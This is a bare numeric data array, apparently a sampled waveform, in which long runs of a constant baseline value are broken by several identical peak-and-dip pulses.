-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 
0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 